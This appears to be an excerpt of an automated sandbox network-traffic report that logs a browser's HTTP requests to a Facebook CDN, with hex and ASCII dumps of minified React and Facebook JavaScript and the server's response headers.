                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 73 68 61 72 65 64 3a 64 2e 73 68 61 72 65 64 2c 63 61 6c 6c 62 61 63 6b 73 3a 64 2e 63 61 6c 6c 62 61 63 6b 73 7d 3b 65 2e 75 70 64 61 74 65 51 75 65 75 65 3d 67 3b 72 65 74 75 72 6e 7d 65 3d 67 2e 6c 61 73 74 42 61 73 65 55 70 64 61 74 65 3b 6e 75 6c 6c 3d 3d 3d 65 3f 67 2e 66 69 72 73 74 42 61 73 65 55 70 64 61 74 65 3d 66 3a 65 2e 6e 65 78 74 3d 66 3b 67 2e 6c 61 73 74 42 61 73 65 55 70 64 61 74 65 3d 66 7d 76 61 72 20 65 65 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 66 65 28 29 7b 69 66 28 65 65 29 7b 76 61 72 20 64 3d 55 64 3b 69 66 28 6e 75 6c 6c 21 3d 3d 64 29 74 68 72 6f 77 20 64 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 66 2c 67 2c 68 2c 64 29 7b 65 65 3d 21 31 3b 76 61 72 20 69 3d 66 2e 75 70 64 61 74 65 51 75 65 75 65 3b 59 64 3d 21 31 3b 76 61 72
                                                                                                                                                                                                                                  Data Ascii: shared:d.shared,callbacks:d.callbacks};e.updateQueue=g;return}e=g.lastBaseUpdate;null===e?g.firstBaseUpdate=f:e.next=f;g.lastBaseUpdate=f}var ee=!1;function fe(){if(ee){var d=Ud;if(null!==d)throw d}}function ge(f,g,h,d){ee=!1;var i=f.updateQueue;Yd=!1;var
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 79 7b 76 61 72 20 6b 3d 66 28 68 2c 67 29 2c 6c 3d 41 2e 53 3b 6e 75 6c 6c 21 3d 3d 6c 26 26 6c 28 6a 2c 6b 29 3b 78 66 28 64 2c 65 2c 6b 29 7d 63 61 74 63 68 28 66 29 7b 7a 66 28 64 2c 65 2c 66 29 7d 66 69 6e 61 6c 6c 79 7b 41 2e 54 3d 69 7d 7d 65 6c 73 65 20 74 72 79 7b 69 3d 66 28 68 2c 67 29 2c 78 66 28 64 2c 65 2c 69 29 7d 63 61 74 63 68 28 66 29 7b 7a 66 28 64 2c 65 2c 66 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 66 28 64 2c 65 2c 66 29 7b 6e 75 6c 6c 21 3d 3d 66 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 66 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 66 2e 74 68 65 6e 3f 66 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 66 29 7b 79 66 28 64 2c 65 2c 66 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                  Data Ascii: y{var k=f(h,g),l=A.S;null!==l&&l(j,k);xf(d,e,k)}catch(f){zf(d,e,f)}finally{A.T=i}}else try{i=f(h,g),xf(d,e,i)}catch(f){zf(d,e,f)}}function xf(d,e,f){null!==f&&"object"===typeof f&&"function"===typeof f.then?f.then(function(f){yf(d,e,f)},function(f){return
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 72 6f 67 72 65 73 73 3b 6e 75 6c 6c 21 3d 69 26 26 6e 75 6c 6c 21 3d 3d 67 26 26 67 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 64 2e 74 72 61 6e 73 69 74 69 6f 6e 73 29 7b 76 61 72 20 67 3d 6e 75 6c 6c 21 3d 3d 64 2e 70 65 6e 64 69 6e 67 42 6f 75 6e 64 61 72 69 65 73 3f 41 72 72 61 79 2e 66 72 6f 6d 28 64 2e 70 65 6e 64 69 6e 67 42 6f 75 6e 64 61 72 69 65 73 2e 76 61 6c 75 65 73 28 29 29 3a 5b 5d 3b 64 2e 74 72 61 6e 73 69 74 69 6f 6e 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 69 28 64 2e 6e 61 6d 65 2c 65 2c 64 2e 73 74 61 72 74 54 69 6d 65 2c 66 2c 67 29 7d 29 7d 7d 29 3b 67 3d 65 2e 6d 61 72 6b 65 72 43 6f 6d 70 6c 65 74 65 3b 76 61 72 20 6a 3d 64 2e 6f 6e 4d 61 72 6b 65 72
                                                                                                                                                                                                                                  Data Ascii: rogress;null!=i&&null!==g&&g.forEach(function(d,e){if(null!==d.transitions){var g=null!==d.pendingBoundaries?Array.from(d.pendingBoundaries.values()):[];d.transitions.forEach(function(d){i(d.name,e,d.startTime,f,g)})}});g=e.markerComplete;var j=d.onMarker
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC14884INData Raw: 2c 67 2c 68 2c 65 29 7b 67 3d 67 2e 72 65 6e 64 65 72 3b 76 61 72 20 69 3d 66 2e 72 65 66 3b 69 66 28 22 72 65 66 22 69 6e 20 68 29 7b 76 61 72 20 6a 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 6b 20 69 6e 20 68 29 22 72 65 66 22 21 3d 3d 6b 26 26 28 6a 5b 6b 5d 3d 68 5b 6b 5d 29 7d 65 6c 73 65 20 6a 3d 68 3b 42 68 28 66 29 3b 68 3d 57 65 28 64 2c 66 2c 67 2c 6a 2c 69 2c 65 29 3b 6b 3d 24 65 28 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 64 26 26 21 4d 29 72 65 74 75 72 6e 20 61 66 28 64 2c 66 2c 65 29 2c 6c 68 28 64 2c 66 2c 65 29 3b 46 26 26 6b 26 26 69 64 28 66 29 3b 66 2e 66 6c 61 67 73 7c 3d 31 3b 4e 28 64 2c 66 2c 68 2c 65 29 3b 72 65 74 75 72 6e 20 66 2e 63 68 69 6c 64 7d 66 75 6e 63 74 69 6f 6e 20 51 67 28 64 2c 66 2c 67 2c 68 2c 65 29 7b 69 66 28 6e 75 6c 6c 3d
                                                                                                                                                                                                                                  Data Ascii: ,g,h,e){g=g.render;var i=f.ref;if("ref"in h){var j={};for(var k in h)"ref"!==k&&(j[k]=h[k])}else j=h;Bh(f);h=We(d,f,g,j,i,e);k=$e();if(null!==d&&!M)return af(d,f,e),lh(d,f,e);F&&k&&id(f);f.flags|=1;N(d,f,h,e);return f.child}function Qg(d,f,g,h,e){if(null=
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 73 65 7b 73 64 28 29 3b 69 66 28 69 3d 3d 3d 68 29 7b 66 3d 6c 68 28 64 2c 66 2c 65 29 3b 62 72 65 61 6b 20 61 7d 4e 28 64 2c 66 2c 69 2c 65 29 7d 66 3d 66 2e 63 68 69 6c 64 7d 72 65 74 75 72 6e 20 66 3b 63 61 73 65 20 32 36 3a 72 65 74 75 72 6e 20 55 67 28 64 2c 66 29 2c 6e 75 6c 6c 3d 3d 3d 64 3f 28 65 3d 57 6e 28 66 2e 74 79 70 65 2c 6e 75 6c 6c 2c 66 2e 70 65 6e 64 69 6e 67 50 72 6f 70 73 2c 6e 75 6c 6c 29 29 3f 66 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3d 65 3a 46 7c 7c 28 65 3d 66 2e 74 79 70 65 2c 64 3d 66 2e 70 65 6e 64 69 6e 67 50 72 6f 70 73 2c 68 3d 68 6e 28 4f 62 2e 63 75 72 72 65 6e 74 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 2c 68 5b 62 61 5d 3d 66 2c 68 5b 76 6f 5d 3d 64 2c 64 6e 28 68 2c 65 2c 64 29 2c 63 61 28 68 29 2c 66
                                                                                                                                                                                                                                  Data Ascii: se{sd();if(i===h){f=lh(d,f,e);break a}N(d,f,i,e)}f=f.child}return f;case 26:return Ug(d,f),null===d?(e=Wn(f.type,null,f.pendingProps,null))?f.memoizedState=e:F||(e=f.type,d=f.pendingProps,h=hn(Ob.current).createElement(e),h[ba]=f,h[vo]=d,dn(h,e,d),ca(h),f
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 65 6d 65 6e 74 54 79 70 65 3d 3d 3d 64 2e 74 79 70 65 29 3b 66 2e 73 74 61 74 65 3d 64 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3b 74 72 79 7b 66 2e 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 6e 6d 6f 75 6e 74 28 29 7d 63 61 74 63 68 28 66 29 7b 5a 28 64 2c 65 2c 66 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6a 69 28 64 2c 65 29 7b 74 72 79 7b 76 61 72 20 66 3d 64 2e 72 65 66 3b 69 66 28 6e 75 6c 6c 21 3d 3d 66 29 7b 76 61 72 20 67 3d 64 2e 73 74 61 74 65 4e 6f 64 65 3b 73 77 69 74 63 68 28 64 2e 74 61 67 29 7b 63 61 73 65 20 32 36 3a 63 61 73 65 20 32 37 3a 63 61 73 65 20 35 3a 76 61 72 20 68 3d 67 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 3d 67 7d 32 31 3d 3d 3d 64 2e 74 61 67 26 26 28 68 3d 67 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f
                                                                                                                                                                                                                                  Data Ascii: ementType===d.type);f.state=d.memoizedState;try{f.componentWillUnmount()}catch(f){Z(d,e,f)}}function ji(d,e){try{var f=d.ref;if(null!==f){var g=d.stateNode;switch(d.tag){case 26:case 27:case 5:var h=g;break;default:h=g}21===d.tag&&(h=g);"function"===typeo
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC14884INData Raw: 75 6e 63 74 69 6f 6e 20 55 69 28 64 2c 65 2c 66 29 7b 66 3d 66 26 26 30 21 3d 3d 28 65 2e 73 75 62 74 72 65 65 46 6c 61 67 73 26 38 37 37 32 29 3b 66 6f 72 28 65 3d 65 2e 63 68 69 6c 64 3b 6e 75 6c 6c 21 3d 3d 65 3b 29 7b 76 61 72 20 67 3d 65 2e 61 6c 74 65 72 6e 61 74 65 2c 68 3d 64 2c 69 3d 65 2c 6a 3d 69 2e 66 6c 61 67 73 3b 73 77 69 74 63 68 28 69 2e 74 61 67 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 31 3a 63 61 73 65 20 31 35 3a 55 69 28 68 2c 69 2c 66 29 3b 66 69 28 34 2c 69 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 55 69 28 68 2c 69 2c 66 29 3b 67 3d 69 3b 68 3d 67 2e 73 74 61 74 65 4e 6f 64 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 68 2e 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 29 74 72 79 7b 68 2e
                                                                                                                                                                                                                                  Data Ascii: unction Ui(d,e,f){f=f&&0!==(e.subtreeFlags&8772);for(e=e.child;null!==e;){var g=e.alternate,h=d,i=e,j=i.flags;switch(i.tag){case 0:case 11:case 15:Ui(h,i,f);fi(4,i);break;case 1:Ui(h,i,f);g=i;h=g.stateNode;if("function"===typeof h.componentDidMount)try{h.


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  80192.168.2.649807157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC374OUTGET /rsrc.php/v3/y9/r/BTdUGzsTGVy.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: xM0p4JC4uzf0Tq5z3PsKvA==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 04:51:19 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: X7AE2LRFqmTgq1Xy3S64eDKkYpXB0NaHhiyMg4/c7hXKN6+RGm5dEuNQu2qedSxqvGpy7i9VPUIXHZXC1d7qbA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:23 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 6156
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC6155INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 44 4f 4d 43 6f 6e 74 72 6f 6c 22 2c 5b 22 24 22 2c 22 44 61 74 61 53 74 6f 72 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 72 6f 6f 74 3d 62 28 22 24 22 29 2e 66 72 6f 6d 49 44 4f 72 45 6c 65 6d 65 6e 74 28 61 29 2c 74 68 69 73 2e 75 70 64 61 74 69 6e 67 3d 21 31 2c 62 28 22 44 61 74 61 53 74 6f 72 65 22 29 2e 73 65 74 28 61 2c 22 44 4f 4d 43 6f 6e 74 72 6f 6c 22 2c 74 68 69 73 29 7d 76 61 72 20 63 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 63 2e 67 65 74 52 6f 6f 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("DOMControl",["$","DataStore"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this.root=b("$").fromIDOrElement(a),this.updating=!1,b("DataStore").set(a,"DOMControl",this)}var c=a.prototype;c.getRoot=function(){return


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  81192.168.2.649808157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC374OUTGET /rsrc.php/v3/yQ/r/WeajZf_EolU.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: Ngjnb72jUa3bDnjuqnOv0Q==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 17:03:12 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: EipL6LNMTmRE2pcO+6T+NCwYXCkXz+y+mHs9M+0SJxaErn0oTasef/FTz8oQLtfUPba2zKPYSagYgO/xLp62YQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:23 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 51589
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 44 53 69 67 6e 61 6c 42 75 66 66 65 72 44 61 74 61 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 7b 7d 3b 62 3d 61 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 53 69 67 6e 61 6c 56 61 6c 75 65 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 63 6e 3d 61 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 67 65 74 53 69 67 6e 61 6c 56 61 6c 75 65 43 6f 6e 74 65 78 74
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("BDSignalBufferData",[],(function(a,b,c,d,e,f){"use strict";a={};b=a;f["default"]=b}),66);__d("SignalValueContext",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(a){this.cn=a}var b=a.prototype;b.getSignalValueContext
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 6c 6c 65 63 74 53 69 67 6e 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 21 3d 6e 75 6c 6c 3b 61 26 26 74 68 69 73 2e 70 61 75 73 65 4c 69 73 74 65 6e 65 72 73 28 29 3b 61 3d 6e 65 77 28 63 28 22 42 6f 6f 6c 65 61 6e 53 69 67 6e 61 6c 56 61 6c 75 65 54 79 70 65 22 29 29 28 44 61 74 65 2e 6e 6f 77 28 29 2c 74 68 69 73 2e 67 65 74 43 6f 6e 74 65 78 74 28 29 2c 61 29 3b 61 3d 7b 73 69 67 6e 61 6c 49 64 3a 74 68 69 73 2e 73 69 67 6e 61 6c 54 79 70 65 2c 64 61 74 61 3a 7b 76 61 6c 75 65 4f 72 45 72 72 6f 72 3a 61 7d 7d 3b 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 64 28 22 42 44 42 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 6f 72 42 61 73 65 22 29 2e 42 49 4f 4d
                                                                                                                                                                                                                                  Data Ascii: llectSignals=function(a){a=a!=null;a&&this.pauseListeners();a=new(c("BooleanSignalValueType"))(Date.now(),this.getContext(),a);a={signalId:this.signalType,data:{valueOrError:a}};window.dispatchEvent(new CustomEvent(d("BDBiometricSignalCollectorBase").BIOM
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 44 5f 42 55 46 46 45 52 5f 53 49 5a 45 2c 7b 73 69 7a 65 3a 61 2e 74 6f 53 74 72 69 6e 67 28 29 2c 74 79 70 65 3a 22 64 22 7d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 67 65 74 44 79 6e 61 6d 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 79 6e 61 6d 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 7d 3b 62 2e 73 65 74 42 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3e 31 3f 74 68 69 73 2e 62 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 61 3a 64 28 22 42 44 4f 70 65 72 61 74 69 6f 6e 4c 6f 67 48 65 6c 70 65 72 22 29 2e 6c 6f 67 45 72 72 6f 72 28 68 2c 64 28 22 42
                                                                                                                                                                                                                                  Data Ascii: D_BUFFER_SIZE,{size:a.toString(),type:"d"});return this};b.getDynamicSignalBufferSize=function(){return this.dynamicSignalBufferSize};b.setBiometricSignalBufferSize=function(a){a>1?this.biometricSignalBufferSize=a:d("BDOperationLogHelper").logError(h,d("B
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC2948INData Raw: 26 26 78 2e 67 65 74 48 65 61 72 74 62 65 61 74 49 6e 74 65 72 76 61 6c 4d 73 28 29 3e 30 26 26 28 7a 2e 63 6f 6c 6c 65 63 74 48 65 61 72 74 62 65 61 74 54 69 6d 65 73 28 71 2c 72 29 2c 70 21 3d 3d 30 26 26 28 77 69 6e 64 6f 77 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 70 29 2c 64 28 22 42 44 4f 70 65 72 61 74 69 6f 6e 4c 6f 67 48 65 6c 70 65 72 22 29 2e 6c 6f 67 57 61 72 6e 69 6e 67 28 6a 2c 64 28 22 42 44 4c 6f 67 67 69 6e 67 43 6f 6e 73 74 61 6e 74 73 22 29 2e 4f 50 45 52 41 54 49 4f 4e 53 2e 48 42 5f 41 4c 52 45 41 44 59 5f 52 55 4e 4e 49 4e 47 29 29 2c 70 3d 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 7a 2e 63 6f 6c 6c 65 63 74 48 65 61 72 74 62 65 61 74 54 69 6d 65 73 28 71 2c 72
                                                                                                                                                                                                                                  Data Ascii: &&x.getHeartbeatIntervalMs()>0&&(z.collectHeartbeatTimes(q,r),p!==0&&(window.clearInterval(p),d("BDOperationLogHelper").logWarning(j,d("BDLoggingConstants").OPERATIONS.HB_ALREADY_RUNNING)),p=window.setInterval(function(){return z.collectHeartbeatTimes(q,r


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  82192.168.2.649809157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC374OUTGET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: cxEZEvS096W1UB3HTVACWw==
                                                                                                                                                                                                                                  Expires: Thu, 18 Sep 2025 21:22:42 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
